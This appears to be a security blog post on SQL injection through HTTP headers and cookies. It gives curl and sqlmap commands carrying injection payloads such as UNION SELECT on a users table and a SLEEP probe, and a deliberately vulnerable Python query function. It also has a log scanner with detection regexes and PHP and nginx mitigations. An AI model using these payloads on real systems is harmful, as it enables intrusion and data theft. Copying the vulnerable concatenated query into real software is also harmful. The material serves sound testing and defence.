SQL Injection in HTTP Headers: A Hidden Threat in Modern Web Apps

This week, a security engineer discovered a working SQL injection vulnerability in the `Referer` header of a web application. Many developers focus only on sanitizing form inputs, but an attacker can inject through HTTP headers and cookie values just as easily, for example:

1. User-Agent

2. Referer

3. X-Forwarded-For

4. session_id (carried in the Cookie header)

SQL injection (SQLi) is not dead; it has moved into less-monitored inputs such as headers. If you are building or testing web apps, remember that headers are user input too: every value the client sends, header or cookie, is untrusted and must be treated like a form field.

You Should Know:

Testing for SQLi in Headers

Here is how to test for SQL injection in HTTP headers, manually with `curl` and automatically with sqlmap:

1. Manual Testing with cURL

curl -H "User-Agent: ' OR 1=1--" http://example.com/login 
curl -H "Referer: ' UNION SELECT username, password FROM users--" http://example.com/dashboard 

2. Automated Testing with sqlmap

# the `*` marks the injection point inside the custom header (sqlmap's custom injection point syntax)
sqlmap -u http://example.com --headers="Referer: *" --level=5 --risk=3
sqlmap -u http://example.com --headers="User-Agent: *" --dbs

3. Exploiting X-Forwarded-For

curl -H "X-Forwarded-For: 127.0.0.1' AND (SELECT 1 FROM users WHERE username='admin')--" http://example.com/admin 

4. Session ID Manipulation

curl -H "Cookie: session_id=' OR SLEEP(5)--" http://example.com/profile 
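
From the defender's side, the probes above leave traces in the web server's access log. The following Python script is an added example, not code from the original post: it parses a few constructed combined-format (nginx/Apache) log lines embedded in the script, URL-decodes the Referer and User-Agent fields, and flags values that match the injection signatures used in the commands above. The sample log lines, the regexes and the function names are all assumptions of this example, and the signature list is a heuristic to tune against real traffic, not a complete SQL grammar.

```python
import re
from urllib.parse import unquote

# Combined Log Format as written by nginx/Apache:
# client ident user [time] "request" status bytes "referer" "user-agent"
# Assumes the log writer escapes embedded double quotes, as both servers do by default.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

# Heuristic SQLi signatures mirroring the payload shapes discussed on this page.
# Detection aid only: expect some false positives on odd but legitimate values.
SQLI_RE = re.compile(
    r"(?i)(?:"
    r"\bunion\b\s+(?:all\s+)?\bselect\b"   # UNION SELECT ...
    r"|\bsleep\s*\("                       # time-based: SLEEP(5)
    r"|'\s*(?:or|and)\b"                   # quote followed by a boolean operator: ' OR 1=1
    r"|(?:--|/\*)\s*$"                     # trailing SQL comment used to cut off the query
    r")"
)

# Constructed sample log (not real traffic). Lines 2, 3 and 5 carry header probes;
# line 5 is URL-encoded, which is why the scanner decodes before matching.
SAMPLE_LOG = """\
203.0.113.7 - - [03/Mar/2025:10:01:02 +0000] "GET /login HTTP/1.1" 200 512 "https://example.com/" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [03/Mar/2025:10:01:09 +0000] "GET /login HTTP/1.1" 500 0 "-" "' OR 1=1--"
198.51.100.4 - - [03/Mar/2025:10:02:15 +0000] "GET /dashboard HTTP/1.1" 200 8192 "' UNION SELECT username, password FROM users--" "curl/8.4.0"
198.51.100.4 - - [03/Mar/2025:10:02:40 +0000] "GET /profile HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.9 - - [03/Mar/2025:10:03:01 +0000] "GET /profile HTTP/1.1" 200 1024 "%27%20OR%20SLEEP%285%29--" "Mozilla/5.0"
"""


def scan_log(text):
    """Return one (line_no, client_ip, field, decoded_value, status) tuple per header
    field whose decoded value matches a SQLi signature. Malformed lines are skipped."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("referer", "user_agent"):
            value = unquote(m.group(field))  # undo %27 etc. before matching
            if SQLI_RE.search(value):
                findings.append((line_no, m.group("ip"), field, value, int(m.group("status"))))
    return findings


if __name__ == "__main__":
    for line_no, ip, field, value, status in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {ip} {field}={value!r} (status {status})")
```

A 5xx status next to a flagged header (line 2 in the sample) is the error-based indicator from the "Expected Output" section below; pairing the two in a SIEM rule cuts the false-positive rate considerably compared with matching on the header alone.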

Mitigation Techniques

  • Input Validation (validate against the expected shape; rejecting is safer than "sanitizing"):
    // FILTER_SANITIZE_STRING is deprecated since PHP 8.1 and never stopped SQLi on its own;
    // a Referer must be a URL, so reject anything that does not parse as one.
    $referer = filter_input(INPUT_SERVER, 'HTTP_REFERER', FILTER_VALIDATE_URL);
    if ($referer === false || $referer === null) { $referer = ''; }

  • Prepared Statements (PHP PDO):
    // The header value is bound as a parameter: it is compared as data, never parsed as SQL.
    $stmt = $pdo->prepare("SELECT * FROM users WHERE ip = ?");
    $stmt->execute([$_SERVER['HTTP_X_FORWARDED_FOR'] ?? '']);

  • Web Application Firewall (WAF) Rules (nginx example; a signature filter is a secondary, bypassable control, so keep the prepared statements regardless):
    location / {
        # ~* makes the match case-insensitive, so "UNION SELECT" and "union select" are both caught
        if ($http_referer ~* "([';].*--|union.*select)") {
            return 403;
        }
    }
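The point made in the introduction, that headers are user input, and the mitigation list above, as an added example written for this page (not code from the original post) in Python with an in-memory SQLite table: a lookup keyed by X-Forwarded-For written with string concatenation, the same lookup as a parameterised query, and an allow-list check that rejects anything that does not parse as an IP address before it reaches the database. The table contents, function names and sample values are constructed for the example.

```python
import ipaddress
import sqlite3


def make_db():
    """Constructed sample table, mirroring the page's 'users' lookup keyed by IP."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, ip TEXT)")
    conn.executemany(
        "INSERT INTO users (username, ip) VALUES (?, ?)",
        [("alice", "10.0.0.5"), ("bob", "10.0.0.9"), ("admin", "127.0.0.1")],
    )
    return conn


def lookup_vulnerable(conn, xff_header):
    """Deliberately vulnerable: the header value is spliced into the SQL text, so a quote
    in the header closes the string literal and the remainder is parsed as SQL."""
    sql = f"SELECT username FROM users WHERE ip = '{xff_header}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, xff_header):
    """Parameterised query: the driver sends the value separately from the SQL text,
    so the header can only ever be compared as data, never parsed as code."""
    rows = conn.execute("SELECT username FROM users WHERE ip = ?", (xff_header,))
    return [row[0] for row in rows]


def validate_client_ip(xff_header):
    """Allow-list validation for X-Forwarded-For. The header may hold a comma-separated
    chain of proxies; take the first hop and require it to parse as an IP address.
    Returns the normalised address, or None if the value is not an IP at all."""
    first_hop = xff_header.split(",")[0].strip()
    try:
        return str(ipaddress.ip_address(first_hop))
    except ValueError:
        return None


def lookup_validated(conn, xff_header):
    """Defence in depth: validate first, then still query with a bound parameter."""
    ip = validate_client_ip(xff_header)
    return [] if ip is None else lookup_safe(conn, ip)


if __name__ == "__main__":
    db = make_db()
    probe = "' OR 1=1--"  # the same boolean payload the curl example above sends
    print("vulnerable:", lookup_vulnerable(db, probe))     # every row comes back
    print("parameterised:", lookup_safe(db, probe))        # nothing matches
    print("validated:", lookup_validated(db, "10.0.0.5, 198.51.100.1"))
```

Validation and parameterisation solve different problems: the bound parameter is what stops the injection, while the IP check keeps garbage out of the table and out of any later code path that might format the value into a shell command, a log line or another query.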

What Undercode Say:

SQL injection remains a critical threat, especially in overlooked inputs such as HTTP headers. Developers must apply strict input validation and parameterized queries to every part of the request, not just form fields. Penetration testers should extend their checks to headers, cookies, and API metadata.

Expected Output:

A vulnerable web app may return:

  • Database error messages (MySQL, PostgreSQL, MSSQL) echoed in responses.
  • Delayed responses (the time-based SLEEP(5) payload).
  • Unauthorized data disclosure (UNION SELECT results rendered in the page).

Prediction:

As APIs and microservices grow, header-based SQLi will rise. Automated tools will evolve to scan headers, but manual testing will remain crucial for advanced exploitation.

(Relevant article: OWASP SQL Injection Guide)

References:

Reported By: Mohammed Sabir – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
